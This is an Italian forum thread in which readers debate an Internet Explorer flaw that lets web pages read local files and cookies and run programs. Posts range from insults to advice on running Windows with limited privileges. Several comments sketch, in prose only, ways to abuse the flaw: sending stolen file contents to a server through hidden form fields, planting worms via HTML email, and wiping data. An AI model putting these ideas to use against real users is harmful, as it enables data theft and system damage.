          Ritengo piu' costruttivo rispondere alla forma della tua lettera piuttosto che al contenuto:quando si discute, tra persone presumibilmente civili, si dovrebbe cercare di mantenere un tono appunto civile, esprimere le proprie opinioni (piu' che legittime qualsiasi esse siano) senza offendere le persone con cui stai parlando, e soprattutto, se possibile, prendere le cose con tranquillita'... farsi venire un infarto per urlare al mondo che Microsoft e' il Male non e' molto furbo...
          • Anonimo scrive:
            Re: - x -
            non è furbo ma lo fa sembrare un hacker, è un ragazzino frustato, e pensa che opponendosi a microsoft combatte per qualche strana libertà, quando non si accorge che lui per primo è schiavo di luoghi comuni e non è in grado di pensare con la sua mente, e quindi per giustificare la sua ignoranza e frustazione vuole far parte di qualcosa che non conosce, e sparando a casaccio contro ms si sente fiero di aver difeso qualcosa e dorme tranquillo, lasciaglielo credere, infondo tutti crescono (prima o poi)
          • Anonimo scrive:
            Re: - x -
            è seplicemente un troll.tutto qua.- Scritto da: ...
            non è furbo ma lo fa sembrare un hacker, è
            un ragazzino frustato, e pensa che
            opponendosi a microsoft combatte per qualche
            strana libertà, quando non si accorge che
            lui per primo è schiavo di luoghi comuni e
            non è in grado di pensare con la sua mente,
            e quindi per giustificare la sua ignoranza e
            frustazione vuole far parte di qualcosa che
            non conosce, e sparando a casaccio contro ms
            si sente fiero di aver difeso qualcosa e
            dorme tranquillo, lasciaglielo credere,
            infondo tutti crescono (prima o poi)
  • Anonimo scrive:
    E questa sarebbe una notizia?
    un altro buco di Explorer!Un buco di Mozilla o di Opera, è una notizia.Ma di Explorer, è routine!
    • Anonimo scrive:
      Re: E questa sarebbe una notizia?
      se nn sbaglio c'è anche un sito dedicato ai bug ms.. ma perchè non segnalarlo dato che ie è il browser + usato?
    • Anonimo scrive:
      Re: E questa sarebbe una notizia?
      - Scritto da: SiN
      un altro buco di Explorer!

      Un buco di Mozilla o di Opera, è una notizia. Per trovarci i buchi dovrebbero prima funzionare.
      • Anonimo scrive:
        Re: E questa sarebbe una notizia?
        - Scritto da: Ciao
        Per trovarci i buchi dovrebbero prima
        funzionare.opera non lo uso ma in compenso utilizzo con soddosfazione mozilla e personalmente trovo funzioni molto bene; puoi per favore specificare quale versione di mozilla hai provato e cosa non funzionava?
      • Anonimo scrive:
        Re: E questa sarebbe una notizia?
        Chi non funziona ? . . . ti stavi riferendo a IE perche' Opera (giunto alla versione 6.04) funziona benissimo e' per fortuna non esegue arbitrariamente tutto cio che trova in rete come avviene con E. Senza contare il fatto che ha un livello di personalizzazione 100 a 1 con IE. Le poche volte che ho aperto le Internet Options di IE mi e' venuto da piangere da quanto e' scarno
      • Anonimo scrive:
        Re: E questa sarebbe una notizia?
        in Opera sono quasi d'accordo. ma in Mozilla cos'è che non funziona? quale versione hai provato prima di dirlo?
      • Anonimo scrive:
        Re: E questa sarebbe una notizia?
        - Scritto da: Ciao


        - Scritto da: SiN

        un altro buco di Explorer!



        Un buco di Mozilla o di Opera, è una
        notizia.


        Per trovarci i buchi dovrebbero prima
        funzionare.guarda... credo di dirtelo a nome di buona parte del forum...ma vai a cagare...e' un invito cortese, s'intende.
      • Anonimo scrive:
        Re: E questa sarebbe una notizia?
        - Scritto da: Ciao
        Per trovarci i buchi dovrebbero prima
        funzionare.Attiva il cervello e rileggi cio` che haiscritto. Ora che ti sei accorto che non hasenso chiedi scusa
  • Anonimo scrive:
    Ma che novità incredibile !
    Ma non me lo sarei mai aspettato !Veramente !Una cosa inconcepibile !Una perla di programma con IE !Per non parlare poi di quei FA-VO-LO-SI programmi che rispondono al nome di Outlook e Outlook Express !E poi... 2 settimane !!!SIGNORI !!!DUE, dicesi DUE settimane !!!E ancora niente patch.Tsz tsz tsz, microsoft, così non si fa !
    • Anonimo scrive:
      Re: Ma che novità incredibile !
      - Scritto da: Memo Remigi[...]Il tuo discorso è totalmente distruttivo.Ritenta.
    • Anonimo scrive:
      Re: Ma che novità incredibile !
      - Scritto da: Memo Remigi

      E poi... 2 settimane !!!
      SIGNORI !!!
      DUE, dicesi DUE settimane !!!
      E ancora niente patch.

      Tsz tsz tsz, microsoft, così non si fa !Il programmatore addetto al codice e' stato licenziato .....hanno preso il suo posto quattro addetti marketing ........ora stanno facendo un corso accellerato di C++ forse per fine anno ...tapperanno il buco con uno piu' grosso !!
    • Anonimo scrive:
      Re: Ma che novità incredibile !

      Per non parlare poi di quei FA-VO-LO-SI
      programmi che rispondono al nome di Outlook
      e Outlook Express !
      che C'E-N-TRA Outlook Express?????non e' la STES-SA CO-SA di Outlook
      • Anonimo scrive:
        Re: Ma che novità incredibile !
        - Scritto da: maks
        che C'E-N-TRA Outlook Express?????
        non e' la STES-SA CO-SA di OutlookMa cosa dici!Guarda che Bill Gates e Berlusconi sono la stessa persona!
        • Anonimo scrive:
          Re: Ma che novità incredibile !
          - Scritto da: eh?

          - Scritto da: maks


          che C'E-N-TRA Outlook Express?????

          non e' la STES-SA CO-SA di Outlook

          Ma cosa dici!
          Guarda che Bill Gates e Berlusconi sono la
          stessa persona!NO! Gates ha i capelli
          • Anonimo scrive:
            Re: Ma che novità incredibile !
            - Scritto da: marchet
            - Scritto da: eh?



            - Scritto da: maks




            che C'E-N-TRA Outlook Express?????


            non e' la STES-SA CO-SA di Outlook



            Ma cosa dici!

            Guarda che Bill Gates e Berlusconi sono la

            stessa persona!

            NO! Gates ha i capelliAzz... non ci avevo fatto caso...
      • Anonimo scrive:
        Re: Ma che novità incredibile !
        ... infatti c'è scritto "programmi", plurale...
  • Anonimo scrive:
    la mamma dei root/administrator e' sempre incinta
    Tutti i Win seri possono essere configurati con profili e NTFS permissions: se invece di lavorare e girare in internet come admin, si lanciasse una sessione in modalita' "utonto" (io lo faccio), questi buchi non avrebbero seguito (test eseguiti e passati).Infatti, anche linux ti suggerisce di non loggarti mai come root per il normale lavoro quotidiano...Lo sappiamo che di buchi ce ne sono e ce ne saranno, basta applicare le norme di base di security... ;-)
    • Anonimo scrive:
      Re: la mamma dei root/administrator e' sempre incinta
      - Scritto da: Gianluca
      Tutti i Win seri possono essere configurati
      con profili e NTFS permissions: se invece di
      lavorare e girare in internet come admin, si
      lanciasse una sessione in modalita' "utonto"
      (io lo faccio), questi buchi non avrebbero
      seguito (test eseguiti e passati).
      Infatti, anche linux ti suggerisce di non
      loggarti mai come root per il normale lavoro
      quotidiano...
      Lo sappiamo che di buchi ce ne sono e ce ne
      saranno, basta applicare le norme di base di
      security... ;-) E' un problema di win, non è nato per il multiuser e ora che ce l'hanno aggiunto mezzi programmi non vanno bene se non sei admin (vedi icq), quindi c'è poco da dire se non fanculo M$.
    • Anonimo scrive:
      Re: la mamma dei root/administrator e' sempre incinta
      - Scritto da: Gianluca
      Tutti i Win seri possono essere configurati
      con profili e NTFS permissions: se invece di
      lavorare e girare in internet come admin, si
      lanciasse una sessione in modalita' "utonto"
      (io lo faccio), questi buchi non avrebbero
      seguito (test eseguiti e passati).
      Infatti, anche linux ti suggerisce di non
      loggarti mai come root per il normale lavoro
      quotidiano...
      Lo sappiamo che di buchi ce ne sono e ce ne
      saranno, basta applicare le norme di base di
      security... ;-) toh! un essere intelligente in questo deserto di sinapsi...
    • Anonimo scrive:
      Re: la mamma dei root/administrator e' sempre incinta
      - Scritto da: Gianluca
      Tutti i Win seri possono essere configurati
      con profili e NTFS permissionsIl problema e' quello: i Win seri. Chi ha 9x o ME che fa, a parte aspettare la patch, spendere un pacco di soldi per Win2k o piratarlo?Devo decidermi a istallare QNX...
      • Anonimo scrive:
        Re: la mamma dei root/administrator e' sempre incinta
        - Scritto da: Co.Bra.


        - Scritto da: Gianluca

        Tutti i Win seri possono essere
        configurati

        con profili e NTFS permissions

        Il problema e' quello: i Win seri. Chi ha 9x
        o ME che fa, a parte aspettare la patch,
        spendere un pacco di soldi per Win2k o
        piratarlo?
        Devo decidermi a istallare QNX...Chi ha 9x o ME e` MOOOLTO sfortunato. Ma soprattutto, perche` ce li ha?
        • Anonimo scrive:
          Re: la mamma dei root/administrator e' sempre incinta
          - Scritto da: dualhost
          Chi ha 9x o ME e` MOOOLTO sfortunato. Ma
          soprattutto, perche` ce li ha? perchè era preinstallato e/o costava meno di NT/2k
          • Anonimo scrive:
            Re: la mamma dei root/administrator e' sempre incinta
            - Scritto da: Ansia


            - Scritto da: dualhost

            Chi ha 9x o ME e` MOOOLTO sfortunato. Ma

            soprattutto, perche` ce li ha?

            perchè era preinstallato e/o costava meno di
            NT/2kMi sono spiegato male. Per che cosa lo usa?Se compri un elettrodomestico che costa poco o che fa acqua, o lo cambi o fai senza.
          • Anonimo scrive:
            Re: la mamma dei root/administrator e' sempre inci
            - Scritto da: dualhost


            - Scritto da: Ansia





            - Scritto da: dualhost


            Chi ha 9x o ME e` MOOOLTO sfortunato.
            Ma


            soprattutto, perche` ce li ha?



            perchè era preinstallato e/o costava meno
            di

            NT/2k

            Mi sono spiegato male. Per che cosa lo usa?

            Se compri un elettrodomestico che costa poco
            o che fa acqua, o lo cambi o fai senza.Se è in garanzia lo riporti al negozio e lo tiri in testa al peracottaro che te lo ha venduto. Se la garanzia è scaduta lo porti a riparare.Ma come si riparano i buchi di un sw se non si sa come è fatto?
    • Anonimo scrive:
      Re: la mamma dei root/administrator e' sempre inci
      - Scritto da: Gianluca
      Tutti i Win seri possono essere configurati
      con profili e NTFS permissions: se invece di
      lavorare e girare in internet come admin, si
      lanciasse una sessione in modalita' "utonto"
      (io lo faccio), questi buchi non avrebbero
      seguito (test eseguiti e passati).
      Infatti, anche linux ti suggerisce di non
      loggarti mai come root per il normale lavoro
      quotidiano...
      Lo sappiamo che di buchi ce ne sono e ce ne
      saranno, basta applicare le norme di base di
      security... ;-) D'accordissimo con Te', su tutto o quasi... 1) Non puoi pretendere, e con questo non voglio giustificare nessuno sia beninteso, che gli utenti dei vari WinX, che sono abituati da sempre ad utilizzare il loro SO da root/administrator, di colpo diventino consapevoli che facendo cosi' si puo aprire la porta a numerosi problemi di sicurezza.Anche in considerazione che il nuovo nato della casa di Redmond (WinXP), nella sua installazione di defoult, ti da' in automatico i permessi di amministratore! Almeno un box di avviso a tal riguardo, di certo, non sarebbe stata cosa sgradita o dannosa, anzi. 2) Fino a che punto si possono impostare i permessi ai singoli file in win NT,2000,XP, ovverosi possono impostare le stesse restrizioni dei sistemi unixoidi (RWXRWXRWX) per intenderci? Domanda posta, vista la mia ingoranza su questo aspetto, verso dei sistemi che uso solo sporadicamente in ambito professionale.Avevo letto su e giu per la rete, che il sistema di permessi non e' che funzioni poi tanto bene.Grazie in anticipo per la rispota.Ciao.
      • Anonimo scrive:
        Re: la mamma dei root/administrator e' sempre inci
        Ti posso assicurare che il livello di definizione di accesso ad un singolo file/folder e' estremamente particolareggiato, pari a quello ottenibile usando i FS di Unix: unica richiesta, bisogna utilizzare NTFS, quindo solo da WinNT 3.x Workstation in su (XP Home incluso).Eccoti la lista estesa dei settings avanzati:Traverse Folder/Execute FileList Folder/Read Data Read AttributesRead Extended Attributes Create Files/Write Data Create Folders/Append Data Write Attributes Write Extended AttributesDelete Subfolders and FilesDeleteRead PermissionsChange PermissionsTake OwnershipSynchronizeIn piu', questi controlli vengono incrociati con le Sharing Permissions (accessi al FS via condivisione di rete), per ottenere il massimo della blindatura, al limite dell'impraticabilita' se si esagera... ;-) Ciao!
        • Anonimo scrive:
          Re: la mamma dei root/administrator e' sempre inci
          Grazie x la reply. Prometto che se questa estate mi avvanza un po + di tempo, anche solo una o due giornate, mi erudisco sul NTFS e sui vari SO WinNT per la parte che riguarda la sua gestione. No so, sinceramente, quanto futuro abbiano ancora i SO proprietari come quello di mamma Microsoft, ma certo e' che ora come ora esistono e sono una realta' concreta, e saperne di + sul loro conto di certo non fa' male a nessuno! ;)A risentirci sui forum, ciao. - Scritto da: Gianluca
          Ti posso assicurare che il livello di
          definizione di accesso ad un singolo
          file/folder e' estremamente
          particolareggiato, pari a quello ottenibile
          usando i FS di Unix: unica richiesta,
          bisogna utilizzare NTFS, quindo solo da
          WinNT 3.x Workstation in su (XP Home
          incluso).

          Eccoti la lista estesa dei settings avanzati:

          Traverse Folder/Execute File
          List Folder/Read Data
          Read Attributes
          Read Extended Attributes
          Create Files/Write Data
          Create Folders/Append Data
          Write Attributes
          Write Extended Attributes
          Delete Subfolders and Files
          Delete
          Read Permissions
          Change Permissions
          Take Ownership
          Synchronize

          In piu', questi controlli vengono incrociati
          con le Sharing Permissions (accessi al FS
          via condivisione di rete), per ottenere il
          massimo della blindatura, al limite
          dell'impraticabilita' se si esagera... ;-)

          Ciao!
    • Anonimo scrive:
      Re: la mamma dei root/administrator e' sempre incinta
      con *ux puoi aprire la tua bella console, scrivere "su" e la password e quindi lavorare come root tranquillamente, lanciando anche programmi grafici. fallo con win2kappa!!!con xp forse è un po' meglio, visto che si può sospendere una sessione. ma devo dire che loggato come utente normale non puoi fare proprio niente: ad esempio non puoi installare programmi che deveono scrivere voci di registro. frustrante. inoltre non ci sono solo i win "seri", c'è anche chi si è comprato winMe originale e non ha voglia di pagare ancora dopo un anno per un nuovo fantastico so. e quindi non ha diritto a caratteristiche avanzatissime come un filesystem dotato di permessi.questo non toglie che tanta ironia da parte dei "nemici di ie" sia eccessiva.- Scritto da: Gianluca
      Tutti i Win seri possono essere configurati
      con profili e NTFS permissions: se invece di
      lavorare e girare in internet come admin, si
      lanciasse una sessione in modalita' "utonto"
      (io lo faccio), questi buchi non avrebbero
      seguito (test eseguiti e passati).
      Infatti, anche linux ti suggerisce di non
      loggarti mai come root per il normale lavoro
      quotidiano...
      Lo sappiamo che di buchi ce ne sono e ce ne
      saranno, basta applicare le norme di base di
      security... ;-)
      • Anonimo scrive:
        Re: la mamma dei root/administrator e' sempre incinta
        Gia' con Win2k usi RunAs (simile all'su) ed esegui localmente un applicativo, anche grafico, nel contesto dell'utente che preferisci; io faccio al contrario di SU, mi loggo in console come Administrator e mi declasso via RunAs ad "utonto" per eseguire Outlook e IE ( piu' McAfee e ZoneAlarm del caso...); utonto non ha diritti avanzati e di esecuzione, e in alcuni casi nemmeno di lettura su certe parti del FS, quindi mi paro abbastanza le chiappe...Per l'export del video su di un'altra macchina, purtroppo occorre Win2k Server con i Terminal Services attivi (non confondiamolo con PcAnywhere): e' in tutto e per tutto paragonabile al funzionamento dell'ExportDisplay di Unix.Volendo permettere anche la scrittura di chiavi di registro, con Regedt32 puoi modificare le permissions anche sui rami del registry, ma ti confesso che sicuramente vai a complicarti la vita...Nulla e' facile, neanche con Unix, bisogna solo studiare e sperimentare: poi si scopre che per certi scopi (e certi budget e certe mentalita'...) e' migliore una soluzione, per altri scopi e' preferibile quella concorrente !!Ciao!
        • Anonimo scrive:
          Re: la mamma dei root/administrator e' sempre inci
          APPLAUSI!!- Scritto da: Gianluca
          Gia' con Win2k usi RunAs (simile all'su) ed
          esegui localmente un applicativo, anche
          grafico, nel contesto dell'utente che
          preferisci; io faccio al contrario di SU, mi
          loggo in console come Administrator e mi
          declasso via RunAs ad "utonto" per eseguire
          Outlook e IE ( piu' McAfee e ZoneAlarm del
          caso...); utonto non ha diritti avanzati e
          di esecuzione, e in alcuni casi nemmeno di
          lettura su certe parti del FS, quindi mi
          paro abbastanza le chiappe...
          Per l'export del video su di un'altra
          macchina, purtroppo occorre Win2k Server con
          i Terminal Services attivi (non
          confondiamolo con PcAnywhere): e' in tutto e
          per tutto paragonabile al funzionamento
          dell'ExportDisplay di Unix.

          Volendo permettere anche la scrittura di
          chiavi di registro, con Regedt32 puoi
          modificare le permissions anche sui rami del
          registry, ma ti confesso che sicuramente vai
          a complicarti la vita...

          Nulla e' facile, neanche con Unix, bisogna
          solo studiare e sperimentare: poi si scopre
          che per certi scopi (e certi budget e certe
          mentalita'...) e' migliore una soluzione,
          per altri scopi e' preferibile quella
          concorrente !!
          Ciao!
        • Anonimo scrive:
          Re: la mamma dei root/administrator e' sempre inci
          Scusa, ma se per usare Win decentemente bisognaessere dei sistemisti esperti tanto vale installare Linux! Non era questo il motivo principale per cui sconsigliavate Linux???- Scritto da: Gianluca
          Gia' con Win2k usi RunAs (simile all'su) ed
          esegui localmente un applicativo, anche
          grafico, nel contesto dell'utente che
          preferisci; io faccio al contrario di SU, mi
          loggo in console come Administrator e mi
          declasso via RunAs ad "utonto" per eseguire
          Outlook e IE ( piu' McAfee e ZoneAlarm del
          caso...); utonto non ha diritti avanzati e
          di esecuzione, e in alcuni casi nemmeno di
          lettura su certe parti del FS, quindi mi
          paro abbastanza le chiappe...
          Per l'export del video su di un'altra
          macchina, purtroppo occorre Win2k Server con
          i Terminal Services attivi (non
          confondiamolo con PcAnywhere): e' in tutto e
          per tutto paragonabile al funzionamento
          dell'ExportDisplay di Unix.

          Volendo permettere anche la scrittura di
          chiavi di registro, con Regedt32 puoi
          modificare le permissions anche sui rami del
          registry, ma ti confesso che sicuramente vai
          a complicarti la vita...

          Nulla e' facile, neanche con Unix, bisogna
          solo studiare e sperimentare: poi si scopre
          che per certi scopi (e certi budget e certe
          mentalita'...) e' migliore una soluzione,
          per altri scopi e' preferibile quella
          concorrente !!
          Ciao!
        • Anonimo scrive:
          Re: la mamma dei root/administrator e' sempre inci

          Gia' con Win2k usi RunAs (simile all'su) ed
          esegui localmente un applicativo, anche
          grafico, nel contesto dell'utente che
          preferisci; grazie per la precisazione, ma credo che una shell di superuser su sia uno strumento più potente del runas di win2k... ovviamente imho.però hai ragione sul fatto che, impegnandosi, si riesca ad applicare l'elementare norma di sicurezza di non lavorare sempre come administrator.
          io faccio al contrario di SU, mi
          loggo in console come Administrator e mi
          declasso via RunAs ad "utonto" per eseguire
          Outlook e IE ( piu' McAfee e ZoneAlarm del
          caso...); utonto non ha diritti avanzati e
          di esecuzione, e in alcuni casi nemmeno di
          lettura su certe parti del FS, quindi mi
          paro abbastanza le chiappe...è una buona idea, però così fai esattamente il contrario di quello che dicevi nel tuo primo post :)e in ogni caso è a rischio la sicurezza dei dati a cui l'utente ha accesso, sopratutto se non è lui l'administrator e quindi non ha modo di memorizzarli in cartelle protette.
          Per l'export del video su di un'altra
          macchina, purtroppo occorre Win2k Server con
          i Terminal Services attivi (non
          confondiamolo con PcAnywhere): e' in tutto e
          per tutto paragonabile al funzionamento
          dell'ExportDisplay di Unix.mi cogli -molto- impreparato in materia. ma cosa c'entra questo con il tuo primo post e con la mia prima risposta?
          Volendo permettere anche la scrittura di
          chiavi di registro, con Regedt32 puoi
          modificare le permissions anche sui rami del
          registry, ma ti confesso che sicuramente vai
          a complicarti la vita...proprio così! che uso windows a fare se non posso giocare/utontare in pace?! :)
          Nulla e' facile, neanche con Unix, bisogna
          solo studiare e sperimentare: poi si scopre
          che per certi scopi (e certi budget e certe
          mentalita'...) e' migliore una soluzione,
          per altri scopi e' preferibile quella
          concorrente !!
          Ciao! sono sostanzialmente d'accordo con la tua frase conclusiva, ma non era su questo tema che volevo discutere.nel tuo primo post tu hai detto che molti utenti di win/iexplorer navigano loggati come administrator nonostante tutti sappiano che è meglio lavorare come utente limitato. e hai fatto il paragone con linux.ciò che io volevo obiettare è che:- in unix è più facile lavorare come utente e fare tutti i lavori di amministrazione da una shell di root, all'occorrenza. gli utenti win non hanno la stessa facilità nel fare la stessa cosa, imho.- non tutti hanno win2k o xp, e quindi l'ntfs se lo sognano. winme ha solo 2 anni (e quindi non possono essere accusati di tirchieria quelli che non lo cambiano :-]), e se non sbaglio anche xp home non ha l'ntfs. correggimi se dico una vaccata.- il discorso "di buchi ce ne saranno sempre, basta applicare..." per me vale fino ad un certo punto: non sono d'accordo nel dare addosso sempre incondizionatamente alla ms, ma una falla non patchata dopo 2 settimane per me è una cosa grave, più per la scarsa considerazione che mostrano in questo modo di avere per il cliente (che se è pagante si sente un po' fesso) che per la sua effettiva pericolosità.ciao.
          • Anonimo scrive:
            Re: la mamma dei root/administrator e' sempre inci
            si xp home ha ntfs perché è architettura nt, è il file system nativo di nt, però nessuno ti impedisce (ma sarebbe un suicidio :)) di mettere fat32
    • Anonimo scrive:
      Re: la mamma dei root/administrator e' sempre incinta
      - Scritto da: Gianluca
      Tutti i Win seri possono essere configurati
      con profili e NTFS permissions: se invece di
      lavorare e girare in internet come admin, si
      lanciasse una sessione in modalita' "utonto"
      (io lo faccio), questi buchi non avrebbero
      seguito (test eseguiti e passati).Si', ma parliamo di modelli di sicurezza.Ti rendi conto che stiamo parlando di un browserche consente di lanciare *arbitrariamente* un'applicazione sul client?
  • Anonimo scrive:
    falso allarme
    E' un hoax, un falso allarme... Leggetevi il codice!
    • Anonimo scrive:
      Re: falso allarme
      - Scritto da: blackdog
      E' un hoax, un falso allarme... Leggetevi il
      codice!io il codice me lo sono letto...vero che non capisco molto di js ma rimane il fatto che, scaricato apposta IE 6.0 e fiondato alla pagine che legge i files, i files che gli passo me li legge tutti...Mi farebbe molto piacere capire dove sta l'hoax...
      • Anonimo scrive:
        Re: falso allarme
        Leggere un file o eseguire un .exe sul MIO disco con il MIO browser e' una banalita' ed e' sempre possibile. Altra cosa e' che un server sulla rete possa "succhiare" queste informazioni. E questo il codice esempio non lo fa (ed e' tutt'altro che facile farlo...). Semplicemente esegue qualcosa di banale in modo piu' complicato.- Scritto da: {}


        - Scritto da: blackdog

        E' un hoax, un falso allarme... Leggetevi
        il

        codice!

        io il codice me lo sono letto...
        vero che non capisco molto di js ma rimane
        il fatto che, scaricato apposta IE 6.0 e
        fiondato alla pagine che legge i files, i
        files che gli passo me li legge tutti...

        Mi farebbe molto piacere capire dove sta
        l'hoax...
        • Anonimo scrive:
          Re: falso allarme
          - Scritto da: blackdog
          Leggere un file o eseguire un .exe sul MIO
          disco con il MIO browser e' una banalita' ed
          e' sempre possibile. Altra cosa e' che un
          server sulla rete possa "succhiare" queste
          informazioni. E questo il codice esempio non
          lo fa (ed e' tutt'altro che facile
          farlo...). Semplicemente esegue qualcosa di
          banale in modo piu' complicato.
          vediamo: stai dicendo che in ogni caso quello che legge non può uscire dal mio pc? e se invece di mandare il file letto in output sul video lo passa a un qualsiasi script che se lo salva sul server?non so, avrei bisogno di studiarmelo meglio
          • Anonimo scrive:
            Re: falso allarme
            Per inviare dati sul server qualunque browser richiede un'autorizzazione. Inoltre quello che invii e' visibile sullo schermo. Se si potesse "barare" su questo punto, si dovrebbe poter fare quasi qualunque cosa... Non ci sarebbe bisogno di usare trojan come BackOrifice. Se esiste un modo di fare cio'... anche io ci dovrei pensare su.- Scritto da: {}


            - Scritto da: blackdog

            Leggere un file o eseguire un .exe sul MIO

            disco con il MIO browser e' una banalita'
            ed

            e' sempre possibile. Altra cosa e' che un

            server sulla rete possa "succhiare" queste

            informazioni. E questo il codice esempio
            non

            lo fa (ed e' tutt'altro che facile

            farlo...). Semplicemente esegue qualcosa
            di

            banale in modo piu' complicato.



            vediamo: stai dicendo che in ogni caso
            quello che legge non può uscire dal mio pc?
            e se invece di mandare il file letto in
            output sul video lo passa a un qualsiasi
            script che se lo salva sul server?

            non so, avrei bisogno di studiarmelo meglio
          • Anonimo scrive:
            Re: falso allarme
            - Scritto da: blackdog
            Per inviare dati sul server qualunque
            browser richiede un'autorizzazione. Inoltre
            quello che invii e' visibile sullo schermo.
            Se si potesse "barare" su questo punto, si
            dovrebbe poter fare quasi qualunque cosa...
            Non ci sarebbe bisogno di usare trojan come
            BackOrifice. Se esiste un modo di fare
            cio'... anche io ci dovrei pensare su.
            no, IE lo chiede la prima volta che provi a spedire (via GET o altro - e ha già spuntato il checkbox "Non chiedere più"), poi spedisce qualsiasi cosa senza chiedere nulla...ripeto, dovrei studiarlo meglio ma ho l'impressione che si possa fare: domani ci provo
          • Anonimo scrive:
            Re: falso allarme
            Si potrebbe utilizzarlo all'interno di una normale form e valorizzare un campo hidden.Cmq troppe cose sono integrate, troppe cose vogliono far fare ad un browser, quando quest'ultimo non dovrebbe far altro che leggere file html.Mah...
          • Anonimo scrive:
            Re: falso allarme
            Vedete che se uno crea una pagina apposita per fare leggere del codice al server, non è che sia soggetta al Browser.. Anche con Netscape funzionerebbe alla stessa maniera (a parte l'ActiveX per eseguire il file, che comunque non è una novità ma si conosceva già)Campi HIDDEN, FORM e cose varie sono cose che vengonoi usate dai programmatori e sono indipendenti dal browser. Se io scrivo una pagina HTML e poi invio i dati al server che la elabora.. beh che colpa ne ha il browser??
          • Anonimo scrive:
            FALSO ALLARME 'STI...
            - Scritto da: Andrea Palmatè
            Vedete che se uno crea una pagina apposita
            per fare leggere del codice al server, non è
            che sia soggetta al Browser.. Anche con
            Netscape funzionerebbe alla stessa maniera
            (a parte l'ActiveX per eseguire il file, che
            comunque non è una novità ma si conosceva
            già)Hemm.. A paerte che questo legge I COOKIE DEGLI ALTRI SITI (ma tanto chissene della Privacy, no?) e che ESEGUE COMANDI ARBITRARI...Ma quando farò una paginetta che all'apertura pialla la directory di Outlook non è un problema, no?Tanto uso Eudora...Mah! A volte rimango sorpreso dall'ignoranza... :([LK]
          • Anonimo scrive:
            Re: FALSO ALLARME 'STI...
            Guarda che il Browser è libero di leggere i cookie degli altri siti.. tanto sei tu lato client che li leggi.. Hai presente quella bella paginetta con quella bella Applet java che ti faceva vedere il contenuto dell'HD??Se IIS leggesse i cookie sul client (al di fuori del proprio dominio..) allora si che sarebbero problemi..Ma fin quando il browser (che si trova lato client) ti fa vedere le cose sul tuo PC non vedo quale sia il problema..Hai mai provato a mettere nella barra degli indirizzi, che ne so, file://c:windowswin.ini?Non vedo quindi la novità..è da tempo che si puo' fare.. da quiando IE è stato integrato nel sistemaMi scuso per l'ignoranza..
        • Anonimo scrive:
          Re: falso allarme
          Ma tu il significato del termine "sicurezza" lo conosci ?Come giustamente dice PI, questa è una VORAGINE !!!!!
          • Anonimo scrive:
            Re: falso allarme
            - Scritto da: Memo Remigi
            Ma tu il significato del termine "sicurezza"
            lo conosci ?spiegacelo tu... altrimenti il tuo post è in utile.
        • Anonimo scrive:
          Re: falso allarme
          - Scritto da: blackdog
          Leggere un file o eseguire un .exe sul MIO
          disco con il MIO browser e' una banalita' ed
          e' sempre possibile. Altra cosa e' che un
          server sulla rete possa "succhiare" queste
          informazioni. E questo il codice esempio non
          lo fa (ed e' tutt'altro che facile
          farlo...). Semplicemente esegue qualcosa di
          banale in modo piu' complicato.Passare ad un server remoto i dati letti da quello script è banalissimo. L'avevo già fatto per sperimentare un baco simile l'anno scorso (addirittura mi trovavo il contenuto del file nel mio database).Il problema è che comunque quel codice funziona in circostanze non ben definite (sul mio Pc nessuno dei tre test ha dato esito).In ogni caso lo stesso tipo di buchi (lettura file e esecuzione exe di cui si conosce percorso) è sempre alla ribalta su IE nonostante le patch continue (su un IE non patchato ci sono una decina di metodi).
        • Anonimo scrive:
          Re: falso allarme
          dimentiki ke OE usa IE per visualizzare email in formato HTML. Basta allegare un worm .exe, fare una paginetta ad hoc, ed ekko ke il tuo bel OE ti installa il virus.Ora kapisci dove sta la vulnerabilità ?SOTFBT3X
    • Anonimo scrive:
      Re: falso allarme
      Se consideri un falso allarme che una pagina html sconosciuta riesca ad eseguire commandi sulla mia macchina...... Ho verificato e purtroppo funziona ho provato con vari commandi e tutti funzionano ...
      • Anonimo scrive:
        Re: falso allarme
        E' vero, ma questo è un baco che già si conosceva e non vedo la novità.. che IE sia bacato, nessuno lo mette in dubbio.. ma alcune volte si esagera.. P.S.Vedete l'articolo di PI sulle statistiche sul sito.. il 95% (se non erro) usa IE.. anche quelli che lo criticano..
        • Anonimo scrive:
          Re: falso allarme
          - Scritto da: Andrea Palmatè
          E' vero, ma questo è un baco che già si
          conosceva e non vedo la novità.. che IE sia
          bacato, nessuno lo mette in dubbio.. maCome no!! La Microsoft fa campagne publicitariemiliardarie per informare gli utenti che IE e`il programma piu` bacato dopo Outlook.

          P.S.
          Vedete l'articolo di PI sulle statistiche
          sul sito.. il 95% (se non erro) usa IE..
          anche quelli che lo criticano..Questo non lo puoi affermare, almeno fino a quandoc'e` un 5% che non lo usa. Anzi quel 5% sara`formato proprio dai pochi che lo criticano controi molti che lo difendono contro ogni evidenza.
          • Anonimo scrive:
            Re: falso allarme
            Non ho detto che è la Microsoft a dire che è bacato, ma noi utenti (e mi ci metto anche io). Per quanto riguarda il 5%, beh.. fatti una statistica di quelli che l'hanno criticato in questi post e le soluzioni sono 2: o scrive solo quel 5% oppure c'è qualcosa che non quadra..
  • Anonimo scrive:
    esecuzione comandi testato: non funziona.
    da me non da alcun effetto.
    • Anonimo scrive:
      Re: esecuzione comandi testato: non funziona.
      boh? a me i file li legge che è una meraviglia (purtroppo)che palle!!!!!!!
    • Anonimo scrive:
      Re: esecuzione comandi testato: non funziona.
      Puo' dipendere anche se i file li hai in una locazione diversa. Prova a lanciare un file che sei sicuro che hai in una data dir.Io ho WinXp e IE6 e funge.Ciao.- Scritto da: provato
      da me non da alcun effetto.
    • Anonimo scrive:
      Re: esecuzione comandi testato: non funziona.
      A me ha funzionato solo una volta.. (bah..)
    • Anonimo scrive:
      Re: esecuzione comandi testato: non funziona.
      Purtroppo a me funziona con Ie 5.5 (sempre patchato) e nt... che palle...
    • Anonimo scrive:
      Re: esecuzione comandi testato: non funziona.
      si vede che oramai sei assuefatto! :)- Scritto da: provato
      da me non da alcun effetto.
      • Anonimo scrive:
        Re: esecuzione comandi testato: non funziona.
        scusate ma non vedo dove sta il problema...un conto è l'esecuzione di un programma e un altro è l'esecuzione di un comandose io faccio "c:prog.exe" e mi parte prog.exe non succede nulla almeno che esso non sia un virus ma in questo caso il virus dovrebbe gia essere caricato nel mio pc.se io invece faccio "del c:prog.exe" non succede nulla (il file non viene cancellato) quindi non si possono lanciare comandi si può solo far eseguire programmi il che dovrebbe essere anche voluto da parte della microsoft
        • Anonimo scrive:
          Re: esecuzione comandi testato: non funziona.
          - Scritto da: DeM0
          scusate ma non vedo dove sta il problema...

